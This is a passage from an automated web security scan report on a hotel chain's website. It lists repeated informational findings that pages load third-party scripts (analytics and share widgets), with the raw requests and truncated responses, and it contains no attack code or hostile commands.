Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=dfc48a516e2595e48797f7ec699aad59;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:33:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:33:45 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=2b52beb91b1537662bbe83f4e05a93ac; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Weekend & Short Hotel Br
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.60. http://www.redcarnationhotels.com/offers-and-gifts/gift-vouchers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /offers-and-gifts/gift-vouchers

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /offers-and-gifts/gift-vouchers HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=dcf5c90f1a028d2043f3c5286a13bdf1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:36:29 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:36:29 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=953b91b9b59a23f915d0e39b7faa2a78; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Gift Experience Vouchers at The
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.61. http://www.redcarnationhotels.com/offers-and-gifts/gifts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /offers-and-gifts/gifts

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /offers-and-gifts/gifts HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/offers-and-gifts
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:36:50 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:36:50 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Gift Ideas - London, Cape Town,
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.62. http://www.redcarnationhotels.com/our-hotels  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /our-hotels

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /our-hotels HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=b403eb641c8dffd747c61c714d9d75b6;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:30:56 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:30:56 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=bb2b87faa4bf29db4a661df002d373ad; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>The Best Hotels in the World, 5
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.63. http://www.redcarnationhotels.com/our-responsibilities  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /our-responsibilities

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /our-responsibilities HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=d4906781592e1e5b19d7a052608c179a;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:33:58 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:33:58 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=7130d936a3463a6c8b92c51ea0b52718; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Corporate & Social Responsibili
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.64. http://www.redcarnationhotels.com/our-responsibilities/acting-global  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /our-responsibilities/acting-global

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /our-responsibilities/acting-global HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/our-responsibilities
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:43:13 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:43:13 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Acting Global - Corporate & Soc
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.65. http://www.redcarnationhotels.com/our-responsibilities/ark-foundation  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /our-responsibilities/ark-foundation

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /our-responsibilities/ark-foundation HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/company-information/about-us
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:42:39 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:42:39 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Winners fo The ark Foundation C
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.66. http://www.redcarnationhotels.com/our-responsibilities/thinking-local  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /our-responsibilities/thinking-local

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /our-responsibilities/thinking-local HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/our-responsibilities
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:43:16 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:43:16 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Thinking Local - Corporate & So
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.67. http://www.redcarnationhotels.com/our-responsibilities/working-together  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /our-responsibilities/working-together

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /our-responsibilities/working-together HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/our-responsibilities
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:43:19 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:43:19 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Working Together - Corporate &
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.68. http://www.redcarnationhotels.com/parties  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /parties

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /parties HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:23 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:23 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Children's Parties, Birthdays a
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.69. http://www.redcarnationhotels.com/partners  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /partners

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=ea8eb17fbf65691c1e359d451c8e1601;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:38:48 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:38:48 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=60761f2064b2ce5c95d191a87519b3d8; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Partners - Red Carnation Hotels
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.70. http://www.redcarnationhotels.com/press-room  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /press-room

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /press-room HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:30:10 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:30:10 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=2c6114f0af7c1e2ab9c507aacb9f262c; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36772

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Press Area - London Luxury Hote
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.71. http://www.redcarnationhotels.com/press-room/awards--accolades  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /press-room/awards--accolades

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /press-room/awards--accolades HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/press-room
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:34:21 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:34:21 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Awards & Accolades - Red Carnat
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.72. http://www.redcarnationhotels.com/press-room/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /press-room/contact-us

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /press-room/contact-us HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/press-room
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:35:20 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:35:20 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Contact Us - London, Florida, G
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.73. http://www.redcarnationhotels.com/press-room/destination-news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /press-room/destination-news

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /press-room/destination-news HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=dcf5c90f1a028d2043f3c5286a13bdf1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:34:15 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:34:15 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=375ec69064b7f3e6fc2ffad07a3e5c1f; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Destination News - London, Flor
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.74. http://www.redcarnationhotels.com/press-room/podcasts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /press-room/podcasts

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /press-room/podcasts HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/press-room
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:35:41 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:35:41 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Podcasts - London, Florida, Gen
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.75. http://www.redcarnationhotels.com/press-room/podcasts/roger_collis  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /press-room/podcasts/roger_collis

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /press-room/podcasts/roger_collis HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:35:47 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:35:47 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Roger's Archives - London, Flor
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.76. http://www.redcarnationhotels.com/press-room/podcasts/this-week-in-london  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /press-room/podcasts/this-week-in-london

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /press-room/podcasts/this-week-in-london HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
